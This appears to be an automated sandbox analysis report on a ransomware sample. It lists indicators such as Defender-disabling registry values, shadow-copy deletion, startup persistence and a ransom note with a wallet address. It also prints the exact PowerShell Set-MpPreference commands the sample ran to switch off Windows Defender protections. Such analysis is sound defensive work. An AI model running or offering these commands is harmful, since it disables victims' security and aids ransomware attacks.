cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

Resubmissions

15/03/2025, 09:05 UTC

250315-k2fw9asrx6 10

15/03/2025, 03:25 UTC

250315-dyre9at1fy 10

Analysis

max time kernel
104s
max time network
119s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
15/03/2025, 09:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Size

87KB
MD5

d6d956267a268c9dcf48445629d2803e
SHA1

cc0feae505dad9c140dd21d1b40b518d8e61b3a4
SHA256

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
SHA512

e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
SSDEEP

1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral4/memory/1632-1-0x00000000005B0000-0x00000000005CC000-memory.dmp	disable_win_def

Disables service(s) 3 TTPs
defense_evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 2 IoCs

flow	pid	Process
11	6624	mshta.exe
13	6624	mshta.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
2	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
7	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1709934376-1871646940-4254144759-1000\Control Panel\International\Geo\Nation	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2336	powershell.exe
4404	powershell.exe
4976	powershell.exe
6032	powershell.exe
5028	powershell.exe
2176	powershell.exe
224	powershell.exe
5144	powershell.exe
2312	powershell.exe
4640	powershell.exe
2340	powershell.exe
2656	powershell.exe
396	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\njosephnull@secmail.pro\r\n"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1948	sc.exe
5972	sc.exe
2956	sc.exe
5588	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1852	cmd.exe
6544	PING.EXE

Interacts with shadow copies 3 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1412	vssadmin.exe
1636	vssadmin.exe
2468	vssadmin.exe
544	vssadmin.exe
1316	vssadmin.exe
1736	vssadmin.exe
1500	vssadmin.exe
1752	vssadmin.exe
2644	vssadmin.exe
2756	vssadmin.exe
5080	vssadmin.exe
5976	vssadmin.exe
4624	vssadmin.exe
5344	vssadmin.exe

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
4264	taskkill.exe
3880	taskkill.exe
6004	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6544	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
5888	powershell.exe
5888	powershell.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Token: SeDebugPrivilege	5888	powershell.exe
Token: SeIncreaseQuotaPrivilege	5888	powershell.exe
Token: SeSecurityPrivilege	5888	powershell.exe
Token: SeTakeOwnershipPrivilege	5888	powershell.exe
Token: SeLoadDriverPrivilege	5888	powershell.exe
Token: SeSystemProfilePrivilege	5888	powershell.exe
Token: SeSystemtimePrivilege	5888	powershell.exe
Token: SeProfSingleProcessPrivilege	5888	powershell.exe
Token: SeIncBasePriorityPrivilege	5888	powershell.exe
Token: SeCreatePagefilePrivilege	5888	powershell.exe
Token: SeBackupPrivilege	5888	powershell.exe
Token: SeRestorePrivilege	5888	powershell.exe
Token: SeShutdownPrivilege	5888	powershell.exe
Token: SeDebugPrivilege	5888	powershell.exe
Token: SeSystemEnvironmentPrivilege	5888	powershell.exe
Token: SeRemoteShutdownPrivilege	5888	powershell.exe
Token: SeUndockPrivilege	5888	powershell.exe
Token: SeManageVolumePrivilege	5888	powershell.exe
Token: 33	5888	powershell.exe
Token: 34	5888	powershell.exe
Token: 35	5888	powershell.exe
Token: 36	5888	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	5144	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	2656	powershell.exe
Token: SeIncreaseQuotaPrivilege	2336	powershell.exe
Token: SeSecurityPrivilege	2336	powershell.exe
Token: SeTakeOwnershipPrivilege	2336	powershell.exe
Token: SeLoadDriverPrivilege	2336	powershell.exe
Token: SeSystemProfilePrivilege	2336	powershell.exe
Token: SeSystemtimePrivilege	2336	powershell.exe
Token: SeProfSingleProcessPrivilege	2336	powershell.exe
Token: SeIncBasePriorityPrivilege	2336	powershell.exe
Token: SeCreatePagefilePrivilege	2336	powershell.exe
Token: SeBackupPrivilege	2336	powershell.exe
Token: SeRestorePrivilege	2336	powershell.exe
Token: SeShutdownPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeSystemEnvironmentPrivilege	2336	powershell.exe
Token: SeRemoteShutdownPrivilege	2336	powershell.exe
Token: SeUndockPrivilege	2336	powershell.exe
Token: SeManageVolumePrivilege	2336	powershell.exe
Token: 33	2336	powershell.exe
Token: 34	2336	powershell.exe
Token: 35	2336	powershell.exe
Token: 36	2336	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeIncreaseQuotaPrivilege	4976	powershell.exe
Token: SeSecurityPrivilege	4976	powershell.exe
Token: SeTakeOwnershipPrivilege	4976	powershell.exe
Token: SeLoadDriverPrivilege	4976	powershell.exe
Token: SeSystemProfilePrivilege	4976	powershell.exe
Token: SeSystemtimePrivilege	4976	powershell.exe
Token: SeProfSingleProcessPrivilege	4976	powershell.exe
Token: SeIncBasePriorityPrivilege	4976	powershell.exe
Token: SeCreatePagefilePrivilege	4976	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 5888	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	81
PID 1632 wrote to memory of 5888	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	81
PID 1632 wrote to memory of 2336	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	84
PID 1632 wrote to memory of 2336	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	84
PID 1632 wrote to memory of 4404	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	86
PID 1632 wrote to memory of 4404	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	86
PID 1632 wrote to memory of 5144	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	88
PID 1632 wrote to memory of 5144	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	88
PID 1632 wrote to memory of 2312	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	90
PID 1632 wrote to memory of 2312	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	90
PID 1632 wrote to memory of 4976	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	92
PID 1632 wrote to memory of 4976	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	92
PID 1632 wrote to memory of 6032	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	94
PID 1632 wrote to memory of 6032	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	94
PID 1632 wrote to memory of 4640	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 1632 wrote to memory of 4640	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 1632 wrote to memory of 2340	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	98
PID 1632 wrote to memory of 2340	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	98
PID 1632 wrote to memory of 5028	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	100
PID 1632 wrote to memory of 5028	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	100
PID 1632 wrote to memory of 2656	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	102
PID 1632 wrote to memory of 2656	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	102
PID 1632 wrote to memory of 396	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	104
PID 1632 wrote to memory of 396	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	104
PID 1632 wrote to memory of 2176	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	106
PID 1632 wrote to memory of 2176	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	106
PID 1632 wrote to memory of 224	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	108
PID 1632 wrote to memory of 224	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	108
PID 1632 wrote to memory of 4604	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	110
PID 1632 wrote to memory of 4604	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	110
PID 1632 wrote to memory of 5504	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	111
PID 1632 wrote to memory of 5504	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	111
PID 1632 wrote to memory of 5464	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	112
PID 1632 wrote to memory of 5464	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	112
PID 1632 wrote to memory of 1244	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	113
PID 1632 wrote to memory of 1244	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	113
PID 1632 wrote to memory of 4476	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	114
PID 1632 wrote to memory of 4476	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	114
PID 1632 wrote to memory of 5140	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	115
PID 1632 wrote to memory of 5140	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	115
PID 1632 wrote to memory of 560	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	116
PID 1632 wrote to memory of 560	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	116
PID 1632 wrote to memory of 1732	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	117
PID 1632 wrote to memory of 1732	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	117
PID 1632 wrote to memory of 1280	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	118
PID 1632 wrote to memory of 1280	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	118
PID 1632 wrote to memory of 2216	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	119
PID 1632 wrote to memory of 2216	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	119
PID 1632 wrote to memory of 4308	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	120
PID 1632 wrote to memory of 4308	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	120
PID 1632 wrote to memory of 464	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	121
PID 1632 wrote to memory of 464	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	121
PID 1632 wrote to memory of 1200	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	122
PID 1632 wrote to memory of 1200	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	122
PID 1632 wrote to memory of 5984	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	123
PID 1632 wrote to memory of 5984	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	123
PID 1632 wrote to memory of 724	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	124
PID 1632 wrote to memory of 724	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	124
PID 1632 wrote to memory of 1824	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	126
PID 1632 wrote to memory of 1824	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	126
PID 1632 wrote to memory of 6116	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	127
PID 1632 wrote to memory of 6116	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	127
PID 1632 wrote to memory of 2536	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	128
PID 1632 wrote to memory of 2536	1632	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	128

C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
"C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Downloads MZ/PE file
- Checks computer location settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4640
